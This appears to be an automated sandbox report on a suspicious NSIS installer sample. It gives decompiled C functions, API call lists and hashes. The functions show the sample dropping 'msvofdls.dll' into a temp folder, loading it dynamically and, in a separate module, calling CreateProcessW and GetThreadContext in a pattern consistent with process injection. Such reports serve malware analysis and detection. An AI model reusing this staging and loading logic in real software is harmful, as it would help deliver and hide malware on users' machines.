                                      				signed int _t70;
                                      				FILETIME* _t71;
                                      				FILETIME* _t75;
                                      				signed int _t77;
                                      				void* _t80;
                                      				CHAR* _t82;
                                      				void* _t85;
                                      
                                      				_t75 = __ebx;
                                      				_t82 = E004029E8(0x31);
                                      				 *(_t85 - 8) = _t82;
                                      				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                                      				_t33 = E0040548B(_t82);
                                      				_push(_t82);
                                      				if(_t33 == 0) {
                                      					lstrcatA(E0040541E(E0040592B(0x409b78, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                                      				} else {
                                      					_push(0x409b78);
                                      					E0040592B();
                                      				}
                                      				E00405B89(0x409b78);
                                      				while(1) {
                                      					__eflags =  *(_t85 + 8) - 3;
                                      					if( *(_t85 + 8) >= 3) {
                                      						_t64 = E00405C22(0x409b78);
                                      						_t77 = 0;
                                      						__eflags = _t64 - _t75;
                                      						if(_t64 != _t75) {
                                      							_t71 = _t64 + 0x14;
                                      							__eflags = _t71;
                                      							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                                      						}
                                      						asm("sbb eax, eax");
                                      						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                      						__eflags = _t70;
                                      						 *(_t85 + 8) = _t70;
                                      					}
                                      					__eflags =  *(_t85 + 8) - _t75;
                                      					if( *(_t85 + 8) == _t75) {
                                      						E004055E3(0x409b78);
                                      					}
                                      					__eflags =  *(_t85 + 8) - 1;
                                      					_t41 = E00405602(0x409b78, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                      					__eflags = _t41 - 0xffffffff;
                                      					 *(_t85 - 0x34) = _t41;
                                      					if(_t41 != 0xffffffff) {
                                      						break;
                                      					}
                                      					__eflags =  *(_t85 + 8) - _t75;
                                      					if( *(_t85 + 8) != _t75) {
                                      						E00404CC9(0xffffffe2,  *(_t85 - 8));
                                      						__eflags =  *(_t85 + 8) - 2;
                                      						if(__eflags == 0) {
                                      							 *((intOrPtr*)(_t85 - 4)) = 1;
                                      						}
                                      						L31:
                                      						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
                                      						__eflags =  *0x42ebe8;
                                      						goto L32;
                                      					} else {
                                      						E0040592B(0x40a378, 0x42f000);
                                      						E0040592B(0x42f000, 0x409b78);
                                      						E0040594D(_t75, 0x40a378, 0x409b78, "C:\Users\hardz\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll",  *((intOrPtr*)(_t85 - 0x10)));
                                      						E0040592B(0x42f000, 0x40a378);
                                      						_t62 = E004051EC("C:\Users\hardz\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll",  *(_t85 - 0x24) >> 3) - 4;
                                      						__eflags = _t62;
                                      						if(_t62 == 0) {
                                      							continue;
                                      						} else {
                                      							__eflags = _t62 == 1;
                                      							if(_t62 == 1) {
                                      								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
                                      								L32:
                                      								_t49 = 0;
                                      								__eflags = 0;
                                      							} else {
                                      								_push(0x409b78);
                                      								_push(0xfffffffa);
                                      								E00404CC9();
                                      								L29:
                                      								_t49 = 0x7fffffff;
                                      							}
                                      						}
                                      					}
                                      					L33:
                                      					return _t49;
                                      				}
                                      				E00404CC9(0xffffffea,  *(_t85 - 8));
                                      				 *0x42ec14 =  *0x42ec14 + 1;
                                      				_push(_t75);
                                      				_push(_t75);
                                      				_push( *(_t85 - 0x34));
                                      				_push( *((intOrPtr*)(_t85 - 0x1c)));
                                      				_t43 = E00402E44(); // executed
                                      				 *0x42ec14 =  *0x42ec14 - 1;
                                      				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                                      				_t80 = _t43;
                                      				if( *(_t85 - 0x18) != 0xffffffff) {
                                      					L22:
                                      					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                                      				} else {
                                      					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                                      					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                                      						goto L22;
                                      					}
                                      				}
                                      				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                                      				__eflags = _t80 - _t75;
                                      				if(_t80 >= _t75) {
                                      					goto L31;
                                      				} else {
                                      					__eflags = _t80 - 0xfffffffe;
                                      					if(_t80 != 0xfffffffe) {
                                      						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffee);
                                      					} else {
                                      						E0040594D(_t75, _t80, 0x409b78, 0x409b78, 0xffffffe9);
                                      						lstrcatA(0x409b78,  *(_t85 - 8));
                                      					}
                                      					_push(0x200010);
                                      					_push(0x409b78);
                                      					E004051EC();
                                      					goto L29;
                                      				}
                                      				goto L33;
                                      			}

                                      APIs
                                      • lstrcatA.KERNEL32(00000000,00000000,hqliygqis,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                      • CompareFileTime.KERNEL32(-00000014,?,hqliygqis,hqliygqis,00000000,00000000,hqliygqis,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                        • Part of subcall function 0040592B: lstrcpynA.KERNEL32(?,?,00000400,00403151,oryzytcrolozawnhxg Setup,NSIS Error), ref: 00405938
                                        • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                        • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                        • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041A90C,74E5EA30), ref: 00404D25
                                        • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsj1052.tmp$C:\Users\user\AppData\Local\Temp\nsj1052.tmp\msvofdls.dll$hqliygqis
                                      • API String ID: 1941528284-2578532003
                                      • Opcode ID: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                      • Instruction ID: 57f74d31a3863b2a576bf3fc3f2571be4e71849821accf25204d9298bb77468e
                                      • Opcode Fuzzy Hash: 9637652f00c021062d2dbe4245cc16957b59b03da3b62afee8cfd87e020825ba
                                      • Instruction Fuzzy Hash: 6C41B471900515FACF10BBB5DD46EAF36A9EF01368B20433BF511B21E1D63C8E418AAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 95%
                                      			E00402E44(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
                                      				signed int _v8;
                                      				long _v12;
                                      				void* _v16;
                                      				long _v20;
                                      				long _v24;
                                      				intOrPtr _v28;
                                      				char _v92;
                                      				void* _t67;
                                      				void* _t68;
                                      				long _t74;
                                      				intOrPtr _t79;
                                      				long _t80;
                                      				void* _t82;
                                      				int _t84;
                                      				intOrPtr _t95;
                                      				void* _t97;
                                      				void* _t100;
                                      				long _t101;
                                      				signed int _t102;
                                      				long _t103;
                                      				int _t104;
                                      				intOrPtr _t105;
                                      				long _t106;
                                      				void* _t107;
                                      
                                      				_t102 = _a16;
                                      				_t97 = _a12;
                                      				_v12 = _t102;
                                      				if(_t97 == 0) {
                                      					_v12 = 0x8000;
                                      				}
                                      				_v8 = _v8 & 0x00000000;
                                      				_v16 = _t97;
                                      				if(_t97 == 0) {
                                      					_v16 = 0x418b80;
                                      				}
                                      				_t65 = _a4;
                                      				if(_a4 >= 0) {
                                      					_t95 =  *0x42ebb8; // 0x9b5d
                                      					E00403098(_t95 + _t65);
                                      				}
                                      				_t67 = E00403066( &_a16, 4); // executed
                                      				if(_t67 == 0) {
                                      					L34:
                                      					_push(0xfffffffd);
                                      					goto L35;
                                      				} else {
                                      					if((_a19 & 0x00000080) == 0) {
                                      						if(_t97 == 0) {
                                      							while(_a16 > 0) {
                                      								_t103 = _v12;
                                      								if(_a16 < _t103) {
                                      									_t103 = _a16;
                                      								}
                                      								if(E00403066(0x414b80, _t103) == 0) {
                                      									goto L34;
                                      								} else {
                                      									if(WriteFile(_a8, 0x414b80, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
                                      										L29:
                                      										_push(0xfffffffe);
                                      										L35:
                                      										_pop(_t68);
                                      										return _t68;
                                      									} else {
                                      										_v8 = _v8 + _t103;
                                      										_a16 = _a16 - _t103;
                                      										continue;
                                      									}
                                      								}
                                      							}
                                      							L45:
                                      							return _v8;
                                      						}
                                      						if(_a16 < _t102) {
                                      							_t102 = _a16;
                                      						}
                                      						if(E00403066(_t97, _t102) != 0) {
                                      							_v8 = _t102;
                                      							goto L45;
                                      						} else {
                                      							goto L34;
                                      						}
                                      					}
                                      					_t74 = GetTickCount();
                                      					 *0x40b4e4 =  *0x40b4e4 & 0x00000000;
                                      					 *0x40b4e0 =  *0x40b4e0 & 0x00000000;
                                      					_t14 =  &_a16;
                                      					 *_t14 = _a16 & 0x7fffffff;
                                      					_v20 = _t74;
                                      					 *0x40afc8 = 8;
                                      					 *0x414b70 = 0x40cb68;
                                      					 *0x414b6c = 0x40cb68;
                                      					 *0x414b68 = 0x414b68;
                                      					_a4 = _a16;
                                      					if( *_t14 <= 0) {
                                      						goto L45;
                                      					} else {
                                      						goto L9;
                                      					}
                                      					while(1) {
                                      						L9:
                                      						_t104 = 0x4000;
                                      						if(_a16 < 0x4000) {
                                      							_t104 = _a16;
                                      						}
                                      						if(E00403066(0x414b80, _t104) == 0) {
                                      							goto L34;
                                      						}
                                      						_a16 = _a16 - _t104;
                                      						 *0x40afb8 = 0x414b80;
                                      						 *0x40afbc = _t104;
                                      						while(1) {
                                      							_t100 = _v16;
                                      							 *0x40afc0 = _t100;
                                      							 *0x40afc4 = _v12;
                                      							_t79 = E00405D23(0x40afb8);
                                      							_v28 = _t79;
                                      							if(_t79 < 0) {
                                      								break;
                                      							}
                                      							_t105 =  *0x40afc0; // 0x41a90c
                                      							_t106 = _t105 - _t100;
                                      							_t80 = GetTickCount();
                                      							_t101 = _t80;
                                      							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
                                      								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                      								_t107 = _t107 + 0xc;
                                      								E00404CC9(0,  &_v92);
                                      								_v20 = _t101;
                                      							}
                                      							if(_t106 == 0) {
                                      								if(_a16 > 0) {
                                      									goto L9;
                                      								}
                                      								goto L45;
                                      							} else {
                                      								if(_a12 != 0) {
                                      									_t82 =  *0x40afc0; // 0x41a90c
                                      									_v8 = _v8 + _t106;
                                      									_v12 = _v12 - _t106;
                                      									_v16 = _t82;
                                      									L24:
                                      									if(_v28 != 1) {
                                      										continue;
                                      									}
                                      									goto L45;
                                      								}
                                      								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
                                      								if(_t84 == 0 || _v24 != _t106) {
                                      									goto L29;
                                      								} else {
                                      									_v8 = _v8 + _t106;
                                      									goto L24;
                                      								}
                                      							}
                                      						}
                                      						_push(0xfffffffc);
                                      						goto L35;
                                      					}
                                      					goto L34;
                                      				}
                                      			}




























                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402EAB
                                      • GetTickCount.KERNEL32 ref: 00402F52
                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F7B
                                      • wsprintfA.USER32 ref: 00402F8B
                                      • WriteFile.KERNELBASE(00000000,00000000,0041A90C,7FFFFFFF,00000000), ref: 00402FB9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CountTick$FileWritewsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 4209647438-2449383134
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 10022555
                                      • GetThreadContext.KERNELBASE(?,00010007), ref: 10022578
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: ContextCreateProcessThread
                                      • String ID: D
                                      • API String ID: 2843130473-2746444292
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 57%
                                      			E00401F51(void* __ebx, void* __eflags) {
                                      				struct HINSTANCE__* _t18;
                                      				struct HINSTANCE__* _t25;
                                      				void* _t26;
                                      				struct HINSTANCE__* _t29;
                                      				CHAR* _t31;
                                      				intOrPtr* _t32;
                                      				void* _t33;
                                      
                                      				_t26 = __ebx;
                                      				asm("sbb eax, 0x42ec18");
                                      				 *(_t33 - 4) = 1;
                                      				if(__eflags < 0) {
                                      					_push(0xffffffe7);
                                      					L14:
                                      					E00401423();
                                      					L15:
                                      					 *0x42ebe8 =  *0x42ebe8 +  *(_t33 - 4);
                                      					return 0;
                                      				}
                                      				_t31 = E004029E8(0xfffffff0);
                                      				 *(_t33 + 8) = E004029E8(1);
                                      				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                                      					L3:
                                      					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                                      					_t29 = _t18;
                                      					if(_t29 == _t26) {
                                      						_push(0xfffffff6);
                                      						goto L14;
                                      					}
                                      					L4:
                                      					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                                      					if(_t32 == _t26) {
                                      						E00404CC9(0xfffffff7,  *(_t33 + 8));
                                      					} else {
                                      						 *(_t33 - 4) = _t26;
                                      						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                                      							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
                                      						} else {
                                      							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                                      							if( *_t32() != 0) {
                                      								 *(_t33 - 4) = 1;
                                      							}
                                      						}
                                      					}
                                      					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                                      						FreeLibrary(_t29);
                                      					}
                                      					goto L15;
                                      				}
                                      				_t25 = GetModuleHandleA(_t31); // executed
                                      				_t29 = _t25;
                                      				if(_t29 != __ebx) {
                                      					goto L4;
                                      				}
                                      				goto L3;
                                      			}











                                      APIs
                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                        • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                        • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041A90C,74E5EA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                        • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041A90C,74E5EA30), ref: 00404D25
                                        • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                        • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                      • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                      • String ID: B
                                      • API String ID: 2987980305-3806887055
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 85%
                                      			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                      				struct _SECURITY_ATTRIBUTES** _t10;
                                      				int _t19;
                                      				struct _SECURITY_ATTRIBUTES* _t20;
                                      				signed char _t22;
                                      				struct _SECURITY_ATTRIBUTES* _t23;
                                      				CHAR* _t25;
                                      				struct _SECURITY_ATTRIBUTES** _t29;
                                      				void* _t30;
                                      
                                      				_t23 = __ebx;
                                      				_t25 = E004029E8(0xfffffff0);
                                      				_t10 = E004054B2(_t25);
                                      				_t27 = _t10;
                                      				if(_t10 != __ebx) {
                                      					do {
                                      						_t29 = E00405449(_t27, 0x5c);
                                      						 *_t29 = _t23;
                                      						 *((char*)(_t30 + 0xb)) =  *_t29;
                                      						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                      						if(_t19 == 0) {
                                      							if(GetLastError() != 0xb7) {
                                      								L4:
                                      								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                      							} else {
                                      								_t22 = GetFileAttributesA(_t25); // executed
                                      								if((_t22 & 0x00000010) == 0) {
                                      									goto L4;
                                      								}
                                      							}
                                      						}
                                      						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                      						 *_t29 = _t20;
                                      						_t27 =  &(_t29[0]);
                                      					} while (_t20 != _t23);
                                      				}
                                      				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                      					_push(0xfffffff5);
                                      					E00401423();
                                      				} else {
                                      					E00401423(0xffffffe6);
                                      					E0040592B("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
                                      					SetCurrentDirectoryA(_t25); // executed
                                      				}
                                      				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                                      				return 0;
                                      			}












                                      APIs
                                        • Part of subcall function 004054B2: CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,00000000), ref: 004054C0
                                        • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
                                        • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4
                                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                      • String ID: C:\Users\user\AppData\Local\Temp
                                      • API String ID: 3751793516-501415292
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
                                      				signed int _t11;
                                      				int _t14;
                                      				signed int _t16;
                                      				void* _t19;
                                      				CHAR* _t20;
                                      
                                      				_t20 = _a4;
                                      				_t19 = 0x64;
                                      				while(1) {
                                      					_t19 = _t19 - 1;
                                      					_a4 = 0x61736e;
                                      					_t11 = GetTickCount();
                                      					_t16 = 0x1a;
                                      					_a6 = _a6 + _t11 % _t16;
                                      					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                      					if(_t14 != 0) {
                                      						break;
                                      					}
                                      					if(_t19 != 0) {
                                      						continue;
                                      					}
                                      					 *_t20 =  *_t20 & 0x00000000;
                                      					return _t14;
                                      				}
                                      				return _t20;
                                      			}









                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405644
                                      • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 0040565E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: "C:\Users\user\Desktop\Y1p8VPvyU2.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                      • API String ID: 1716503409-3023057193
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 10021D6A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 738ec3acab21ef3c714b51d36d3b7c70e38e0a8d21abb50b91232a96a65bddd9
                                      • Instruction ID: 973ef1f3de952ea3ca1aa1dd87104c624138c88802d8a93105d5aa9987b02891
                                      • Opcode Fuzzy Hash: 738ec3acab21ef3c714b51d36d3b7c70e38e0a8d21abb50b91232a96a65bddd9
                                      • Instruction Fuzzy Hash: D3611739E50248EADB60CFE4E852BEDB7B6EF48710F60441AE518EB2A0E7711A41DB45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E004030AF(void* __eflags) {
                                      				void* _t2;
                                      				void* _t5;
                                      				CHAR* _t6;
                                      
                                      				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                                      				E00405B89(_t6);
                                      				_t2 = E0040548B(_t6);
                                      				if(_t2 != 0) {
                                      					E0040541E(_t6);
                                      					CreateDirectoryA(_t6, 0); // executed
                                      					_t5 = E00405631("1033", _t6); // executed
                                      					return _t5;
                                      				} else {
                                      					return _t2;
                                      				}
                                      			}







                                      APIs
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                        • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Char$Next$CreateDirectoryPrev
                                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 4115351271-1075807775
                                      • Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                      • Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
                                      • Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                      • Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAlloc.KERNELBASE(00000000,11E1A300,00003000,00000004), ref: 1000CA2B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.306671685.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000000.00000002.306631226.0000000010000000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306816372.000000001001A000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.306885146.0000000010020000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.306927852.0000000010021000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.306980254.0000000010023000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.307022371.0000000010026000.00000002.00020000.sdmp
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 2aa7d7e5d320f4a0cf1cacce7f07d352a3b7a33f38796e28da7bb157149135ec
                                      • Instruction ID: 35e18b2fd3fe9979c14f84380769d6918174682e04fc1f73b309c7ecafc9c62e
                                      • Opcode Fuzzy Hash: 2aa7d7e5d320f4a0cf1cacce7f07d352a3b7a33f38796e28da7bb157149135ec
                                      • Instruction Fuzzy Hash: D081EF1400DAF44BF306873E6CE13603FB06E6790172A498AD5FDE6AA7EE644346DF61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 69%
                                      			E00401389(signed int _a4) {
                                      				intOrPtr* _t6;
                                      				void* _t8;
                                      				void* _t10;
                                      				signed int _t11;
                                      				void* _t12;
                                      				intOrPtr _t15;
                                      				signed int _t16;
                                      				signed int _t17;
                                      				void* _t18;
                                      
                                      				_t17 = _a4;
                                      				while(_t17 >= 0) {
                                      					_t15 =  *0x42eb90; // 0x72145c
                                      					_t6 = _t17 * 0x1c + _t15;
                                      					if( *_t6 == 1) {
                                      						break;
                                      					}
                                      					_push(_t6); // executed
                                      					_t8 = E00401434(); // executed
                                      					if(_t8 == 0x7fffffff) {
                                      						return 0x7fffffff;
                                      					}
                                      					_t10 = E0040136D(_t8);
                                      					if(_t10 != 0) {
                                      						_t11 = _t10 - 1;
                                      						_t16 = _t17;
                                      						_t17 = _t11;
                                      						_t12 = _t11 - _t16;
                                      					} else {
                                      						_t12 = _t10 + 1;
                                      						_t17 = _t17 + 1;
                                      					}
                                      					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                      						 *0x42e34c =  *0x42e34c + _t12;
                                      						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
                                      					}
                                      				}
                                      				return 0;
                                      			}













                                      APIs
                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
